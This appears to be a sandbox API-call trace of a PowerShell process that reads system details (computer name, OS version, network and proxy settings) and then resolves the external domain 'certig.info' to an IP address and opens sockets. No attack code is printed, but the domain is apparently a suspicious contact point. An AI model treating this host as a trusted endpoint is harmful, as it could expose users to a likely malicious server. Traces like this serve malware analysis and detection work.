	[0116.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c60d8c0 | out: lpFileInformation=0x1c60d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0116.561] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.561] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dac8 | out: TokenHandle=0x1c60dac8*=0x368) returned 1
	[0116.561] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.562] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dac8 | out: TokenHandle=0x1c60dac8*=0x36c) returned 1
	[0116.630] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.630] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d748 | out: TokenHandle=0x1c60d748*=0x370) returned 1
	[0116.900] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.900] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d748 | out: TokenHandle=0x1c60d748*=0x374) returned 1
	[0116.910] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac
	[0116.910] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0117.149] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.150] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d718 | out: TokenHandle=0x1c60d718*=0x354) returned 1
	[0117.217] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.217] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d718 | out: TokenHandle=0x1c60d718*=0x37c) returned 1
	[0117.509] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.509] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d658 | out: TokenHandle=0x1c60d658*=0x380) returned 1
	[0117.517] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.517] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d658 | out: TokenHandle=0x1c60d658*=0x384) returned 1
	[0117.533] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.533] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dc98 | out: TokenHandle=0x1c60dc98*=0x388) returned 1
	[0117.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60bd58 | out: phkResult=0x1c60bd58*=0x398) returned 0x0
	[0117.613] RegQueryValueExW (in: hKey=0x398, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c60bcdc, lpData=0x0, lpcbData=0x1c60bcd8*=0x0 | out: lpType=0x1c60bcdc*=0x1, lpData=0x0, lpcbData=0x1c60bcd8*=0xe) returned 0x0
	[0117.613] CoTaskMemAlloc (cb=0x12) returned 0x1b343da0
	[0117.613] RegQueryValueExW (in: hKey=0x398, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c60bcac, lpData=0x1b343da0, lpcbData=0x1c60bca8*=0xe | out: lpType=0x1c60bcac*=0x1, lpData="Client", lpcbData=0x1c60bca8*=0xe) returned 0x0
	[0117.613] CoTaskMemFree (pv=0x1b343da0) 
	[0117.613] RegCloseKey (hKey=0x398) returned 0x0
	[0117.648] CoTaskMemAlloc (cb=0xcd0) returned 0x1b346310
	[0117.678] RasEnumConnectionsW (in: param_1=0x1b346310, param_2=0x1c60dcec, param_3=0x1c60dce8 | out: param_1=0x1b346310, param_2=0x1c60dcec, param_3=0x1c60dce8) returned 0x0
	[0117.681] CoTaskMemFree (pv=0x1b346310) 
	[0117.919] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c60daf8 | out: lpWSAData=0x1c60daf8) returned 0
	[0117.927] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.933] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.933] closesocket (s=0x404) returned 0
	[0117.933] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.935] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.935] closesocket (s=0x404) returned 0
	[0117.941] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.941] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d378 | out: TokenHandle=0x1c60d378*=0x404) returned 1
	[0117.962] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.962] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d378 | out: TokenHandle=0x1c60d378*=0x408) returned 1
	[0117.997] GetCurrentProcessId () returned 0x808
	[0118.040] CoTaskMemAlloc (cb=0x204) returned 0x22c020
	[0118.040] GetComputerNameW (in: lpBuffer=0x22c020, nSize=0x2ed6428 | out: lpBuffer="XDUWTFONO", nSize=0x2ed6428) returned 1
	[0118.040] CoTaskMemFree (pv=0x22c020) 
	[0118.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60d858 | out: phkResult=0x1c60d858*=0x40c) returned 0x0
	[0118.041] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c60d7dc, lpData=0x0, lpcbData=0x1c60d7d8*=0x0 | out: lpType=0x1c60d7dc*=0x1, lpData=0x0, lpcbData=0x1c60d7d8*=0x1c) returned 0x0
	[0118.041] CoTaskMemAlloc (cb=0x20) returned 0x1b347740
	[0118.041] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c60d7ac, lpData=0x1b347740, lpcbData=0x1c60d7a8*=0x1c | out: lpType=0x1c60d7ac*=0x1, lpData="netfxperf.dll", lpcbData=0x1c60d7a8*=0x1c) returned 0x0
	[0118.041] CoTaskMemFree (pv=0x1b347740) 
	[0118.041] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c60d7dc, lpData=0x0, lpcbData=0x1c60d7d8*=0x0 | out: lpType=0x1c60d7dc*=0x4, lpData=0x0, lpcbData=0x1c60d7d8*=0x4) returned 0x0
	[0118.042] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c60d7e0, lpData=0x1c60d7dc, lpcbData=0x1c60d7d8*=0x4 | out: lpType=0x1c60d7e0*=0x4, lpData=0x1c60d7dc*=0x1, lpcbData=0x1c60d7d8*=0x4) returned 0x0
	[0118.042] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c60d7dc, lpData=0x0, lpcbData=0x1c60d7d8*=0x0 | out: lpType=0x1c60d7dc*=0x4, lpData=0x0, lpcbData=0x1c60d7d8*=0x4) returned 0x0
	[0118.042] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c60d7e0, lpData=0x1c60d7dc, lpcbData=0x1c60d7d8*=0x4 | out: lpType=0x1c60d7e0*=0x4, lpData=0x1c60d7dc*=0x137a, lpcbData=0x1c60d7d8*=0x4) returned 0x0
	[0118.042] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.101] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60d818 | out: phkResult=0x1c60d818*=0x40c) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c60d79c, lpData=0x0, lpcbData=0x1c60d798*=0x0 | out: lpType=0x1c60d79c*=0x4, lpData=0x0, lpcbData=0x1c60d798*=0x4) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c60d7a0, lpData=0x1c60d79c, lpcbData=0x1c60d798*=0x4 | out: lpType=0x1c60d7a0*=0x4, lpData=0x1c60d79c*=0x3, lpcbData=0x1c60d798*=0x4) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c60d79c, lpData=0x0, lpcbData=0x1c60d798*=0x0 | out: lpType=0x1c60d79c*=0x4, lpData=0x0, lpcbData=0x1c60d798*=0x4) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c60d7a0, lpData=0x1c60d79c, lpcbData=0x1c60d798*=0x4 | out: lpType=0x1c60d7a0*=0x4, lpData=0x1c60d79c*=0x20000, lpcbData=0x1c60d798*=0x4) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c60d79c, lpData=0x0, lpcbData=0x1c60d798*=0x0 | out: lpType=0x1c60d79c*=0x3, lpData=0x0, lpcbData=0x1c60d798*=0xaa) returned 0x0
	[0118.101] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c60d79c, lpData=0x2ed9718, lpcbData=0x1c60d798*=0xaa | out: lpType=0x1c60d79c*=0x3, lpData=0x2ed9718*, lpcbData=0x1c60d798*=0xaa) returned 0x0
	[0118.105] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0118.154] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c60d750, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0118.167] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x410
	[0118.170] MapViewOfFile (hFileMappingObject=0x410, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1bc40000
	[0118.170] VirtualQuery (in: lpAddress=0x1bc40000, lpBuffer=0x1c60d748, dwLength=0x30 | out: lpBuffer=0x1c60d748*(BaseAddress=0x1bc40000, AllocationBase=0x1bc40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0118.208] LocalFree (hMem=0x2777b0) returned 0x0
	[0118.208] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.212] GetVersionExW (in: lpVersionInformation=0x1c60c720*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c60c720*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.213] GetVersionExW (in: lpVersionInformation=0x1c60c6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c60c6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.214] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eda3e8, cbSid=0x1c60d730 | out: pSid=0x2eda3e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d730) returned 1
	[0118.245] CreateMutexW (lpMutexAttributes=0x2eda5f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0118.246] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.250] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.262] GetCurrentProcessId () returned 0x808
	[0118.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x414
	[0118.263] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c60d640, lpExitTime=0x1c60d638, lpKernelTime=0x1c60d630, lpUserTime=0x1c60d628 | out: lpCreationTime=0x1c60d640, lpExitTime=0x1c60d638, lpKernelTime=0x1c60d630, lpUserTime=0x1c60d628) returned 1
	[0118.264] CloseHandle (hObject=0x414) returned 1
	[0118.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x414
	[0118.264] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c60d6d0, lpExitTime=0x1c60d6c8, lpKernelTime=0x1c60d6c0, lpUserTime=0x1c60d6b8 | out: lpCreationTime=0x1c60d6d0, lpExitTime=0x1c60d6c8, lpKernelTime=0x1c60d6c0, lpUserTime=0x1c60d6b8) returned 1
	[0118.265] CloseHandle (hObject=0x414) returned 1
	[0118.265] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x414
	[0118.266] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.266] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.267] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c60d628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c60d628*=0x418) returned 1
	[0118.268] CloseHandle (hObject=0x418) returned 1
	[0118.269] CloseHandle (hObject=0x414) returned 1
	[0118.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x414
	[0118.269] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c60d6d0, lpExitTime=0x1c60d6c8, lpKernelTime=0x1c60d6c0, lpUserTime=0x1c60d6b8 | out: lpCreationTime=0x1c60d6d0, lpExitTime=0x1c60d6c8, lpKernelTime=0x1c60d6c0, lpUserTime=0x1c60d6b8) returned 1
	[0118.269] CloseHandle (hObject=0x414) returned 1
	[0118.269] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x414
	[0118.269] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.269] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.269] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c60d628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c60d628*=0x418) returned 1
	[0118.270] CloseHandle (hObject=0x418) returned 1
	[0118.270] CloseHandle (hObject=0x414) returned 1
	[0118.272] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2edb540, cbSid=0x1c60d730 | out: pSid=0x2edb540*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d730) returned 1
	[0118.281] CreateMutexW (lpMutexAttributes=0x2edb6f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.282] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.282] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2edc368, cbSid=0x1c60d730 | out: pSid=0x2edc368*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d730) returned 1
	[0118.282] CreateMutexW (lpMutexAttributes=0x2edc520, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.283] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.283] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2edd1a0, cbSid=0x1c60d730 | out: pSid=0x2edd1a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d730) returned 1
	[0118.283] CreateMutexW (lpMutexAttributes=0x2edd358, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.284] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.284] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eddfd0, cbSid=0x1c60d730 | out: pSid=0x2eddfd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d730) returned 1
	[0118.284] CreateMutexW (lpMutexAttributes=0x2ede188, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.285] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.286] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2edee00, cbSid=0x1c60d6e0 | out: pSid=0x2edee00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d6e0) returned 1
	[0118.286] CreateMutexW (lpMutexAttributes=0x2edefb8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.287] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2edfc48, cbSid=0x1c60d6e0 | out: pSid=0x2edfc48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d6e0) returned 1
	[0118.287] CreateMutexW (lpMutexAttributes=0x2edfe00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.288] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.288] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ee0a60, cbSid=0x1c60d6e0 | out: pSid=0x2ee0a60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d6e0) returned 1
	[0118.288] CreateMutexW (lpMutexAttributes=0x2ee0c18, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.289] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.289] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ee1888, cbSid=0x1c60d6e0 | out: pSid=0x2ee1888*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d6e0) returned 1
	[0118.289] CreateMutexW (lpMutexAttributes=0x2ee1a40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.290] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.290] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ee26a8, cbSid=0x1c60d6e0 | out: pSid=0x2ee26a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c60d6e0) returned 1
	[0118.290] CreateMutexW (lpMutexAttributes=0x2ee2860, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.291] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.333] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x40c
	[0118.334] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414
	[0118.335] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x1c60dd18 | out: argp=0x1c60dd18) returned 0
	[0118.378] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418
	[0118.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0118.378] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x1c60dd18 | out: argp=0x1c60dd18) returned 0
	[0118.503] WSAIoctl (in: s=0x40c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c60dc90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c60dc90, lpOverlapped=0x0) returned -1
	[0118.505] CoTaskMemAlloc (cb=0x204) returned 0x22be10
	[0118.505] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x22be10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.528] CoTaskMemFree (pv=0x22be10) 
	[0118.529] WSAEventSelect (s=0x40c, hEventObject=0x414, lNetworkEvents=512) returned 0
	[0118.529] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c60dc90, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c60dc90, lpOverlapped=0x0) returned -1
	[0118.529] CoTaskMemAlloc (cb=0x204) returned 0x22be10
	[0118.529] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x22be10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.529] CoTaskMemFree (pv=0x22be10) 
	[0118.529] WSAEventSelect (s=0x418, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0118.529] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420
	[0118.531] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x420, param_3=0x3) returned 0x0
	[0118.539] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c60ddd0 | out: phkResult=0x1c60ddd0*=0x438) returned 0x0
	[0118.542] RegOpenKeyExW (in: hKey=0x438, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60dcb8 | out: phkResult=0x1c60dcb8*=0x43c) returned 0x0
	[0118.542] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440
	[0118.543] RegNotifyChangeKeyValue (hKey=0x43c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x440, fAsynchronous=1) returned 0x0
	[0118.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60dce0 | out: phkResult=0x1c60dce0*=0x444) returned 0x0
	[0118.544] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0118.544] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0118.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c60dce0 | out: phkResult=0x1c60dce0*=0x44c) returned 0x0
	[0118.545] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0118.545] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0118.545] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.545] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dc48 | out: TokenHandle=0x1c60dc48*=0x454) returned 1
	[0118.554] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.554] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d418 | out: TokenHandle=0x1c60d418*=0x458) returned 1
	[0118.615] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.615] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d418 | out: TokenHandle=0x1c60d418*=0x46c) returned 1
	[0118.707] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c60dd18 | out: pProxyConfig=0x1c60dd18) returned 1
	[0119.011] SetEvent (hEvent=0x3ac) returned 1
	[0119.336] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.336] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d488 | out: TokenHandle=0x1c60d488*=0x4bc) returned 1
	[0119.337] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.338] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d488 | out: TokenHandle=0x1c60d488*=0x4c0) returned 1
	[0119.368] SetEvent (hEvent=0x3ac) returned 1
	[0119.488] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c60d958 | out: pFixedInfo=0x0, pOutBufLen=0x1c60d958) returned 0x6f
	[0119.622] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b35bf80
	[0119.622] GetNetworkParams (in: pFixedInfo=0x1b35bf80, pOutBufLen=0x1c60d958 | out: pFixedInfo=0x1b35bf80, pOutBufLen=0x1c60d958) returned 0x0
	[0119.692] CoTaskMemAlloc (cb=0xd) returned 0x1b353650
	[0119.692] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0119.692] CoTaskMemFree (pv=0x1b353650) 
	[0119.695] LocalFree (hMem=0x1b35bf80) returned 0x0
	[0119.711] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d4
	[0119.712] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d0
	[0119.715] CoTaskMemAlloc (cb=0xd) returned 0x1b353650
	[0119.717] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c60d900*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c60d8f8 | out: ppResult=0x1c60d8f8*=0x1b354d10*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b353790*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0120.345] CoTaskMemFree (pv=0x1b353650) 
	[0120.345] CoTaskMemFree (pv=0x0) 
	[0120.346] FreeAddrInfoW (pAddrInfo=0x1b354d10*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b353790*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0120.348] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
